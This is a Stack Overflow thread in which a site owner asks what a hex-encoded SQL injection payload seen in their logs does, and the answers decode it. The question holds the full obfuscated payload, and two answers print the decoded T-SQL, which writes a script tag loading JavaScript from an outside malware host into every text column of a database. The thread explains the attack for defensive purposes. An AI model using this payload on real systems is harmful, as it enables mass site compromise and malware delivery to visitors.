# SQL injection attack - What is going on here?

Tags: sql-injection

> **Possible Duplicate:**
>   [Attempted SQL injection attack - what are they trying to do?](https://stackoverflow.com/questions/200545/attempted-sql-injection-attack-what-are-they-trying-to-do)

I have seen this SQL injection attempt on my site many times in the last few months.

```
';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);
```

After going through my code, I'm sure I'm protected because I query against an in-memory dataset rather than the database itself.  However, even though I'm sure I'm protected, I don't fully understand what's going on with this attack attempt and would like to figure it out so I can avoid writing code in the future that may be vulnerable to it.

Can anyone explain to me what these hackers are attempting to do with this code?

Thanks.

-This code is getting appended to the query string as well as getting sent as post data.

Comment: If you've already been infected, check out this SO thread for help on resolving the issue: http://stackoverflow.com/questions/32412/whats-the-best-way-of-cleaning-up-after-a-sql-injection#32422

Comment: Seems like you're more prepared than some other sites: http://blogs.zdnet.com/security/?p=2039

Comment: Ya, I'm use to seeing hack attempts with the standard SQL injection attempts trying to get links on the site and what-not.  

When I saw this one, I thought - wow, that's pretty clever, I had better check my source to find any possible attack vectors.

Answer (score 20, accepted):

Note: my first explanation was incorrect because I didn't actually read through the whole thing...

here's what that translates to. It searches your database for text or varchar columns (b.xtype in 99,35,231,167) and then injects a javascript file into all text columns in your database. A bit more malicious than I first thought.

```
DECLARE 
    @T varchar(255),
    @C varchar(4000) 

DECLARE Table_Cursor CURSOR FOR 
    select a.name,b.name 
    from sysobjects a,syscolumns b 
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor 
INTO @T,@C 

WHILE(@@FETCH_STATUS=0) 
BEGIN exec('update ['+@T+'] set ['+@C+']=''">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"></script>
      <!--''+['+@C+'] where '+@C+' not like ''%">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'
'')
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor
```

Comment: @Jimmy: how did you decipher this?

Comment: I ran it on my sql server :P

Comment: if you wanted to do it manually, every 2 hex digits defines a number 0-255, which you look up in an ASCII table.

Comment: Thanks, I'm glad I understand what's going on there now.

It looks like one of those attacks that can be thwarted by the standard methods of avoiding SQL injection, but I'm glad I understand it further now.

Comment: it's designed to defeat blacklists. another example of why blacklisting keywords is a bad idea

Comment: "I ran it on my sql server" - Ha! +1 for bravery! 
It's a good way of obfuscating SQL anyway...

Comment: I didn't run the last "EXEC(@S);", of course ;)

Comment: unobfuscate with this online tool: http://www.percederberg.net/tools/text_converter.html

Answer (score 7):

Actually Jimmy, if you analyze this code, it uses a cursor to inject a javascript reference to hxxp://www2.s800qn.cn/csrss/w.js in every text field in the database.

This means that they don't care about your database, what they want is to use your page to steal data from the users browsing it.

That javascript link is now dead, but it probably contained code to grab the users cookies.

Comment: yeah, I noticed that after I posted my original answer, so I rewrote. Thanks for the catch

Comment: Cripes... does StackOverflow automatically make any "http://blahblah.com" strings into active links?  I know you didn't do that on purpose! :)

Answer (score 3):

Further to Jimmy's post: you can also use a hex-ascii translator to get this:

```
DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR  FOR select 
a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and 
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT 
FROM  Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN 
exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn
/csrs/w.js"></script>''+['+@C+'] where '+@C+' not like ''%"></title><script 
src="http://www2.s800qn.cn/csrss/w.js"></script>''')FETCH NEXT FROM  Table_Cursor INTO 
@T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
```

Comment: I ran into this a while back and created a small Winforms app that will do the translation for you as well, thanks to some help from some SO folks here: http://www.codeplex.com/urldecoder

Comment: http://www.string-functions.com/hex-string.aspx

Comment: Wow, I went to all that crazy work and yet there was already a web site that slipped through my googling fingers... Well, at least I learned some new stuff through the process. 8^D

Answer (score 2):

Just to help if you haven't figured out already this is an **automated attack** not targeted. And the **purpose of the included .js file** is distributing malware by using your website and it includes several exploits mostly targets IE users.